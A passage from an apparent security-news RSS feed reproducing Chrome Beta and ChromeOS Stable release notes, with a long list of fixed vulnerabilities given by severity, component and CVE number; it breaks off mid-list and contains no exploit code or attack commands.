<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Beta channel has been updated to 151.0.7922.34 for Windows, Mac and Linux.</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/151.0.7922.19..151.0.7922.34?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stable Channel Update for ChromeOS / ChromeOS Flex]]></title>
<description><![CDATA[The ChromeOS Stable channel is being updated to OS version 16700.46.0 (Browser version 150.0.7871.150) for most ChromeOS devices.If you find new issues, please let us know one of the following ways:File a bugVisit our ChromeOS communitiesGeneral: Chromebook Help CommunityBeta Specific: ChromeOS B...]]></description>
<link>https://tsecurity.de/de/3678844/it-security-nachrichten/stable-channel-update-for-chromeos-chromeos-flex/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678844/it-security-nachrichten/stable-channel-update-for-chromeos-chromeos-flex/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span color="rgba(0, 0, 0, 0.87)">The ChromeOS Stable channel is being updated to OS version </span><span color="rgba(0, 0, 0, 0.87)">16700.46.0</span><span color="rgba(0, 0, 0, 0.87)"> (Browser version </span><span color="rgba(0, 0, 0, 0.87)">150.0.7871.150</span><span color="rgba(0, 0, 0, 0.87)">) for most ChromeOS devices.</span></p><div><span><span>If you find new issues, please let us know one of the following ways:</span></span></div><ol><li><span><span><a href="https://bugs.chromium.org/p/chromium/issues/list"><span>File a bug</span></a></span></span></li><li aria-level="1"><p role="presentation"><span><span>Visit our ChromeOS communities</span></span></p></li><ol><li aria-level="2"><p role="presentation"><span><span>General: </span><a href="https://support.google.com/chromebook/community/?hl=en&amp;gpf=%23!forum%2Fchromebook-central"><span>Chromebook Help Community</span></a></span></p></li><li aria-level="2"><p role="presentation"><span><span>Beta Specific: </span><a href="https://support.google.com/chromeos-beta/community"><span>ChromeOS Beta Help Community</span></a></span></p></li></ol><li aria-level="1"><p role="presentation"><a href="https://support.google.com/chrome/answer/95315?hl=en&amp;co=GENIE.Platform%3DDesktop"><span><span><span>Report an issue or send feedback on Chrome</span></span></span></a></p></li><li aria-level="1"><p role="presentation"><span><span>Interested in switching channels? </span><a href="https://support.google.com/chromebook/answer/1086915"><span>Find out how.</span></a></span></p></li></ol><div><span><h4 dir="ltr"><span>ChromeOS Vulnerability Rewards Program Reported Bug Fixes:</span></h4><br><p dir="ltr"><span>N/A</span></p><h4 dir="ltr"><span>Other 3rd Party Security Fixes Included:</span></h4><br><p dir="ltr"><span>High</span><span> Fixes  CVE-2026-46242 (Bad epoll) - Linux Local Privilege Escalation </span></p><p dir="ltr"><span>Medium</span><span> Fixes  CVE-2026-49746 [PSP-528][PP-173890][KMD] Dimension Mismatch and Integer Truncation in `PMRDevPhysAddrOSMem` </span></p><p dir="ltr"><span>High</span><span> Fixes   Potential UAF via Profile/Service Desync in shill ConfigureService </span></p><p dir="ltr"><span>Medium</span><span> Fixes   CWE-862: shill Manager.NotifyDHCPEvent reachable from chronos allows DHCP spoofing </span></p><p dir="ltr"><span>Medium</span><span> Fixes  CVE-2026-45204 [PSP-406][PowerVR] Out of bounds memory access and kernel NULL pointer dereference in DmaTransfer when pui64Address is a pointer to device memory </span></p><p dir="ltr"><span>High</span><span> Fixes   Stack OOB Read to Heap OOB Write in msm_ccmd_ioctl_simple via Guest-Controlled _IOC_SIZE </span></p><p dir="ltr"><span>High</span><span> Fixes   [LPE] Patchpanel ConnectNamespace PID Gate Bypass Allows CAP_NET_ADMIN Root Netns Operations </span></p><p dir="ltr"><span>Medium</span><span> Fixes  CVE-2026-49745 [PSP-598][PP-174017] Unvalidated sHWPerfCtlDMABuf GPU-VA, DMA-write into FW privdata via MMU ctx 0 </span></p><p dir="ltr"><span>High</span><span> Fixes   Heap OOB write in ANGLE D3D11 vertex streaming via `WEBGL_draw_instanced_base_vertex_base_instance` </span></p><p dir="ltr"><span>High</span><span> Fixes   Use-After-Free in CRAS LE-Audio via group removal race condition </span></p><p dir="ltr"><span>High</span><span> Fixes   Cross-client microphone audio exfiltration via missing CRAS stream ownership check </span></p><p dir="ltr"><span>High</span><span> Fixes   Use-After-Free in CRAS server via dangling active_fm-&gt;lea pointer </span></p><p dir="ltr"><span>Critical</span><span> Fixes   [LPE] Arbitrary file read as root in printscanmgr via FD leak and path traversal </span></p><p dir="ltr"><span>High</span><span> Fixes   Privilege escalation in CRAS via DlcStateChanged signal spoofing </span></p><p dir="ltr"><span>High</span><span> Fixes   missing untrusted input validation in chromeos-boot-alert leads to root pango-view processing attacker file </span></p><p dir="ltr"><span>High</span><span> Fixes   UAF and Control Flow Hijack in CRAS A2DP Profile Switching </span></p><p dir="ltr"><span>Medium</span><span> Fixes   Heap OOB Read in Floss A2DP via Ring Buffer Misalignment </span></p><p dir="ltr"><span>High</span><span> Fixes   Heap OOB write in CRAS mSBC SCO handling via dynamic packet size adjustment </span></p><p dir="ltr"><span>High</span><span> Fixes   UAF in CRAS server via dangling default_rmod-&gt;odev pointer after stream disconnect </span></p><p dir="ltr"><span>High</span><span> Fixes   Crosvm xHCI guest-to-host OOB write via unchecked DMA buffer size </span></p><p dir="ltr"><span>High</span><span> Fixes   Use-After-Free in CRAS HFP SLC due to leaked timer in AT+CMER handler </span></p><p dir="ltr"><span>High</span><span> Fixes   CRAS OOB write via integer overflow in cras_shm_buff_for_idx </span></p><p dir="ltr"><span>High</span><span> Fixes   OOB write in CRAS via unsigned underflow in cras_audio_area_copy </span></p><p dir="ltr"><span>High</span><span> Fixes   Use-After-Free in CRAS echo_ref_requests via concurrent list mutation </span></p><p dir="ltr"><span>High</span><span> Fixes   Unauthenticated CRAS Loopback Hijacking allows Cross-Client Audio Capture </span></p><p dir="ltr"><span>High</span><span> Fixes   Use-After-Free in CRAS loopback traversal due to data race </span></p><p dir="ltr"><span>High</span><span> Fixes   Out-of-bounds write in CRAS server via unvalidated client_shm_size </span></p><p dir="ltr"><span>Critical</span><span> Fixes   [LPE] Arbitrary `tc` Command Injection in `shill` Throttler via `TetheringConfig` </span></p><p dir="ltr"><span>High</span><span> Fixes   Potential Use-After-Free in vm_concierge ArcVm via base::Unretained in async D-Bus callback </span></p><p dir="ltr"><span>Medium</span><span> Fixes   TOCTOU in permission_broker allows chronos to open arbitrary device nodes </span></p><p dir="ltr"><span>Medium</span><span> Fixes   [PSP-490][PowerVR] Read UAF in GrowMipLevelArray() due to incorrect texture array iteration during image copy </span></p><p dir="ltr"><span>Medium</span><span> Fixes   [PSP-495][PowerVR] OOB read in CreateTextureMemory() due to memory mismanagement after texture format change </span></p><p dir="ltr"><span>Medium</span><span> Fixes   [PSP-516][PowerVR] Secondary mapping of the freelist PMR allows reading Freelist contents via GPU shader </span></p><p dir="ltr"><span>Medium</span><span> Fixes   [PSP-443][KMD][PowerVR] Read UAF of sync checkpoint in pvr_sync_finalise_fence() after update fence file descriptor is prematurely closed </span></p><p dir="ltr"><span>Medium</span><span> Fixes  CVE-2026-34196 [PSP-372][PowerVR] UAF read and/or write of arbitrary physical memory due to integer truncation in PMRDevPhysAddrOSMem </span></p><p dir="ltr"><span>Medium</span><span> Fixes  CVE-2026-7639 [PSP-452][KMD] Page UAF read in `PMMETA_PROTECT` heap memory </span></p><p dir="ltr"><span>Medium</span><span> Fixes   [PSP-415] [PROJ-ZERO] PowerVR: [crash-only bug] kernel crash due to faulting userspace memory access without fault handling </span></p><p dir="ltr"><span>Android Security fixes can be found </span><a href="https://source.android.com/docs/security/bulletin/2026-07-01"><span>here</span></a></p><br><h4 dir="ltr"><span>Chrome Browser Security Fixes:</span></h4><br><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/524395469"><span>[524395469</span></a><span>] </span><span>High</span><span> CVE-2026-13855 Use after free in Ozone  on  2026-06-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/524290062"><span>[524290062</span></a><span>] </span><span>Medium</span><span> CVE-2026-14432 Use after free in V8  on  2026-06-15 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523884658"><span>[523884658</span></a><span>] </span><span>High</span><span> CVE-2026-14431 Type Confusion in V8 Reported by [OpenAI Codex Security (amyb)] on  2026-06-14 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523690961"><span>[523690961</span></a><span>] </span><span>High</span><span> CVE-2026-13854 Use after free in Ozone  on  2026-06-13 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/523224019"><span>[523224019</span></a><span>] </span><span>High</span><span> CVE-2026-13853 Use after free in Journeys  on  2026-06-12 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/520571816"><span>[520571816</span></a><span>] </span><span>High</span><span> CVE-2026-14429 Insufficient validation of untrusted input in Skia  on  2026-06-05 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/520113415"><span>[520113415</span></a><span>] </span><span>Critical</span><span> CVE-2026-14427 Heap buffer overflow in Skia  on  2026-06-04 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/518247789"><span>[518247789</span></a><span>] </span><span>Low</span><span> CVE-2026-14156 Policy bypass in StorageAccessAPI  on  2026-05-30 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/518246925"><span>[518246925</span></a><span>] </span><span>Low</span><span> CVE-2026-14155 Insufficient policy enforcement in StorageAccessAPI  on  2026-05-30 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/518245882"><span>[518245882</span></a><span>] </span><span>Medium</span><span> CVE-2026-14024 Use after free in Ozone  on  2026-05-30 </span></p><p dir="ltr"><span>[$1000.0] </span><a href="https://issuetracker.google.com/517981277"><span>[517981277</span></a><span>] </span><span>High</span><span> CVE-2026-14426 Use after free in V8 Reported by [] on  2026-05-30 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/518063436"><span>[518063436</span></a><span>] </span><span>Medium</span><span> CVE-2026-14023 Insufficient validation of untrusted input in SanitizerAPI  on  2026-05-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/518007821"><span>[518007821</span></a><span>] </span><span>Critical</span><span> CVE-2026-13786 Use after free in Ozone  on  2026-05-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517935753"><span>[517935753</span></a><span>] </span><span>High</span><span> CVE-2026-14425 Use after free in ANGLE  on  2026-05-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517791835"><span>[517791835</span></a><span>] </span><span>Medium</span><span> CVE-2026-14022 Insufficient validation of untrusted input in Network  on  2026-05-29 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517741170"><span>[517741170</span></a><span>] </span><span>Low</span><span> CVE-2026-14154 Inappropriate implementation in DevTools  on  2026-05-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517731924"><span>[517731924</span></a><span>] </span><span>Medium</span><span> CVE-2026-14021 Insufficient validation of untrusted input in StorageAccessAPI  on  2026-05-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517684077"><span>[517684077</span></a><span>] </span><span>Low</span><span> CVE-2026-14153 Inappropriate implementation in Glic  on  2026-05-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517598518"><span>[517598518</span></a><span>] </span><span>Medium</span><span> CVE-2026-14020 Insufficient validation of untrusted input in WebXR  on  2026-05-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517534944"><span>[517534944</span></a><span>] </span><span>Low</span><span> CVE-2026-14152 Out of bounds write in ANGLE  on  2026-05-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517522769"><span>[517522769</span></a><span>] </span><span>High</span><span> CVE-2026-14423 Type Confusion in Tint  on  2026-05-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517455455"><span>[517455455</span></a><span>] </span><span>Medium</span><span> CVE-2026-14019 Inappropriate implementation in Passwords on IP-literal pages  on  2026-05-28 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517381770"><span>[517381770</span></a><span>] </span><span>Low</span><span> CVE-2026-14151 Inappropriate implementation in AI  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517376041"><span>[517376041</span></a><span>] </span><span>Low</span><span> CVE-2026-14150 Insufficient validation of untrusted input in Speech  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517345069"><span>[517345069</span></a><span>] </span><span>High</span><span> CVE-2026-13848 Use after free in Forms  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517241992"><span>[517241992</span></a><span>] </span><span>Medium</span><span> CVE-2026-14017 Inappropriate implementation in Navigation  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517234388"><span>[517234388</span></a><span>] </span><span>Medium</span><span> CVE-2026-14016 Insufficient policy enforcement in SVG  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517155893"><span>[517155893</span></a><span>] </span><span>Medium</span><span> CVE-2026-14014 Inappropriate implementation in Paint  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517114175"><span>[517114175</span></a><span>] </span><span>Medium</span><span> CVE-2026-14013 Inappropriate implementation in SVG  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517110749"><span>[517110749</span></a><span>] </span><span>Medium</span><span> CVE-2026-14012 Side-channel information leakage in CSS  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517033235"><span>[517033235</span></a><span>] </span><span>Medium</span><span> CVE-2026-14421 Uninitialized Use in Dawn on ChromeOS-ARM due to disabled Mali multi-resolve workaround  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/517031505"><span>[517031505</span></a><span>] </span><span>Critical</span><span> CVE-2026-14420 Out of bounds read and write in Dawn  on  2026-05-27 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516981393"><span>[516981393</span></a><span>] </span><span>Critical</span><span> CVE-2026-14419 Use after free in Skia on Allocation Failure  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516962715"><span>[516962715</span></a><span>] </span><span>Critical</span><span> CVE-2026-13784 Use after free in Views  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516962178"><span>[516962178</span></a><span>] </span><span>Critical</span><span> CVE-2026-13783 Use after free in Views  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516944556"><span>[516944556</span></a><span>] </span><span>Medium</span><span> CVE-2026-14011 Out of bounds read in SurfaceCapture  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516936863"><span>[516936863</span></a><span>] </span><span>High</span><span> CVE-2026-13845 Use after free in DOM  on  2026-05-26 </span></p><p dir="ltr"><span>[$3000.0] </span><a href="https://issuetracker.google.com/516836297"><span>[516836297</span></a><span>] </span><span>High</span><span> CVE-2026-13842 Incorrect security UI in Chrome for iOS Reported by [] on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516865345"><span>[516865345</span></a><span>] </span><span>High</span><span> CVE-2026-14418 Uninitialized Use in ANGLE  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516819850"><span>[516819850</span></a><span>] </span><span>Medium</span><span> CVE-2026-14009 Insufficient data validation in Passwords  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516781007"><span>[516781007</span></a><span>] </span><span>Medium</span><span> CVE-2026-14008 Uninitialized Use in WebXR  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516683433"><span>[516683433</span></a><span>] </span><span>Critical</span><span> CVE-2026-13782 Use after free in Browser  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516649133"><span>[516649133</span></a><span>] </span><span>Critical</span><span> CVE-2026-14417 Use after free in Dawn  on  2026-05-26 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516457532"><span>[516457532</span></a><span>] </span><span>Critical</span><span> CVE-2026-13781 Insufficient validation of untrusted input in Skia  on  2026-05-25 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/516425999"><span>[516425999</span></a><span>] </span><span>Medium</span><span> CVE-2026-14007 Insufficient policy enforcement in PermissionsPolicy  on  2026-05-25 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/515467789"><span>[515467789</span></a><span>] </span><span>High</span><span> CVE-2026-13841 Integer overflow in Skia  on  2026-05-21 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/515428315"><span>[515428315</span></a><span>] </span><span>Low</span><span> CVE-2026-14416 Out of bounds read in Dawn  on  2026-05-21 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/515426873"><span>[515426873</span></a><span>] </span><span>Low</span><span> CVE-2026-14148 Type Confusion in CSS  on  2026-05-21 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/515427046"><span>[515427046</span></a><span>] </span><span>Low</span><span> CVE-2026-14149 Use after free in Audio  on  2026-05-21 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/515423596"><span>[515423596</span></a><span>] </span><span>Medium</span><span> CVE-2026-14006 Use after free in Navigation  on  2026-05-21 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/515086856"><span>[515086856</span></a><span>] </span><span>Low</span><span> CVE-2026-14415 Inappropriate implementation in V8  on  2026-05-20 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514769383"><span>[514769383</span></a><span>] </span><span>Critical</span><span> CVE-2026-13780 Insufficient validation of untrusted input in ANGLE  on  2026-05-19 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514632767"><span>[514632767</span></a><span>] </span><span>Low</span><span> CVE-2026-14147 Inappropriate implementation in CSS  on  2026-05-19 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514609778"><span>[514609778</span></a><span>] </span><span>High</span><span> CVE-2026-13840 Insufficient policy enforcement in Canvas  on  2026-05-19 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514550047"><span>[514550047</span></a><span>] </span><span>Low</span><span> CVE-2026-14146 Inappropriate implementation in CSS  on  2026-05-19 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514538751"><span>[514538751</span></a><span>] </span><span>Medium</span><span> CVE-2026-14004 Inappropriate implementation in CSS  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514503077"><span>[514503077</span></a><span>] </span><span>Medium</span><span> CVE-2026-14003 Insufficient policy enforcement in Extensions  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514489361"><span>[514489361</span></a><span>] </span><span>Medium</span><span> CVE-2026-14002 Inappropriate implementation in Geolocation  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514485825"><span>[514485825</span></a><span>] </span><span>Low</span><span> CVE-2026-14145 Inappropriate implementation in CSS  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514481943"><span>[514481943</span></a><span>] </span><span>Medium</span><span> CVE-2026-14001 Inappropriate implementation in Network  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514461552"><span>[514461552</span></a><span>] </span><span>Medium</span><span> CVE-2026-14000 Inappropriate implementation in XML  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514449396"><span>[514449396</span></a><span>] </span><span>High</span><span> CVE-2026-13839 Inappropriate implementation in CSS  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514445398"><span>[514445398</span></a><span>] </span><span>High</span><span> CVE-2026-13838 Inappropriate implementation in CSS  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514429130"><span>[514429130</span></a><span>] </span><span>High</span><span> CVE-2026-13837 Inappropriate implementation in CSS  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514420555"><span>[514420555</span></a><span>] </span><span>High</span><span> CVE-2026-13836 Inappropriate implementation in CSS  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514338102"><span>[514338102</span></a><span>] </span><span>High</span><span> CVE-2026-13835 Inappropriate implementation in XML  on  2026-05-18 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514079793"><span>[514079793</span></a><span>] </span><span>Low</span><span> CVE-2026-14144 Incorrect security UI in Views on Desktop  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514073460"><span>[514073460</span></a><span>] </span><span>Low</span><span> CVE-2026-14142 Inappropriate implementation in Extensions  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514072495"><span>[514072495</span></a><span>] </span><span>Low</span><span> CVE-2026-14139 Inappropriate implementation in TabStrip  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514071697"><span>[514071697</span></a><span>] </span><span>Medium</span><span> CVE-2026-13999 Inappropriate implementation in Extensions  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514068972"><span>[514068972</span></a><span>] </span><span>Medium</span><span> CVE-2026-13996 Incorrect security UI in Permissions  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514064139"><span>[514064139</span></a><span>] </span><span>Medium</span><span> CVE-2026-13993 Incorrect security UI in WebAppInstalls  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514058566"><span>[514058566</span></a><span>] </span><span>Low</span><span> CVE-2026-14135 Insufficient validation of untrusted input in Network  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514056221"><span>[514056221</span></a><span>] </span><span>Medium</span><span> CVE-2026-13989 Insufficient policy enforcement in PageInfo  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514040614"><span>[514040614</span></a><span>] </span><span>Medium</span><span> CVE-2026-13988 Inappropriate implementation in Paint  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514039947"><span>[514039947</span></a><span>] </span><span>Low</span><span> CVE-2026-14133 Race in History Embeddings  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514039492"><span>[514039492</span></a><span>] </span><span>Low</span><span> CVE-2026-14132 Inappropriate implementation in WebXR  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514020982"><span>[514020982</span></a><span>] </span><span>Low</span><span> CVE-2026-14131 Insufficient validation of untrusted input in WebAppInstalls  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514020959"><span>[514020959</span></a><span>] </span><span>Medium</span><span> CVE-2026-13986 Inappropriate implementation in Media UI  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514019522"><span>[514019522</span></a><span>] </span><span>Low</span><span> CVE-2026-14130 Incorrect security UI in Omnibox  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514013849"><span>[514013849</span></a><span>] </span><span>Medium</span><span> CVE-2026-13985 Inappropriate implementation in MediaCapture  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514009654"><span>[514009654</span></a><span>] </span><span>Low</span><span> CVE-2026-14127 Inappropriate implementation in Printing  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514010404"><span>[514010404</span></a><span>] </span><span>Medium</span><span> CVE-2026-13984 Incorrect security UI in TabStrip  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/514006829"><span>[514006829</span></a><span>] </span><span>Medium</span><span> CVE-2026-13982 Incorrect security UI in Passwords  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513988889"><span>[513988889</span></a><span>] </span><span>Medium</span><span> CVE-2026-13979 Inappropriate implementation in Paint  on  2026-05-17 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513948227"><span>[513948227</span></a><span>] </span><span>Medium</span><span> CVE-2026-14414 Insufficient validation of untrusted input in Skia  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513925114"><span>[513925114</span></a><span>] </span><span>High</span><span> CVE-2026-13834 Insufficient validation of untrusted input in ANGLE  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513922055"><span>[513922055</span></a><span>] </span><span>High</span><span> CVE-2026-14413 Uninitialized Use in ANGLE  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513920834"><span>[513920834</span></a><span>] </span><span>High</span><span> CVE-2026-14412 Insufficient validation of untrusted input in ANGLE  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513919827"><span>[513919827</span></a><span>] </span><span>High</span><span> CVE-2026-14411 Insufficient validation of untrusted input in ANGLE  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513918431"><span>[513918431</span></a><span>] </span><span>Low</span><span> CVE-2026-14125 Uninitialized Use in ANGLE  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513866949"><span>[513866949</span></a><span>] </span><span>Medium</span><span> CVE-2026-13978 Insufficient policy enforcement in PageInfo  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513859894"><span>[513859894</span></a><span>] </span><span>Medium</span><span> CVE-2026-13977 Inappropriate implementation in HTMLParser on context element  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513858286"><span>[513858286</span></a><span>] </span><span>Medium</span><span> CVE-2026-13976 Heap buffer overflow in Storage  on  2026-05-16 </span></p><p dir="ltr"><span>[$1000.0] </span><a href="https://issuetracker.google.com/513631768"><span>[513631768</span></a><span>] </span><span>Medium</span><span> CVE-2026-14408 Uninitialized Use in Dawn Reported by [Chrovus ] on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513836996"><span>[513836996</span></a><span>] </span><span>Low</span><span> CVE-2026-14410 Inappropriate implementation in Skia  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513810921"><span>[513810921</span></a><span>] </span><span>Low</span><span> CVE-2026-14409 Inappropriate implementation in V8 Reported by [] on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513832989"><span>[513832989</span></a><span>] </span><span>Medium</span><span> CVE-2026-13973 Inappropriate implementation in UI  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513822378"><span>[513822378</span></a><span>] </span><span>High</span><span> CVE-2026-13832 Use after free in Headless  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513792140"><span>[513792140</span></a><span>] </span><span>Medium</span><span> CVE-2026-13972 Inappropriate implementation in Paint  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513789382"><span>[513789382</span></a><span>] </span><span>Low</span><span> CVE-2026-14121 Use after free in Chromoting on Linux Wayland  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513781328"><span>[513781328</span></a><span>] </span><span>High</span><span> CVE-2026-13831 Use after free in GPU  on  2026-05-16 </span></p><p dir="ltr"><span>[$TBD] </span><a href="https://issuetracker.google.com/513780208"><span>[513780208</span></a><span>] </span><span>Medium</span><span> 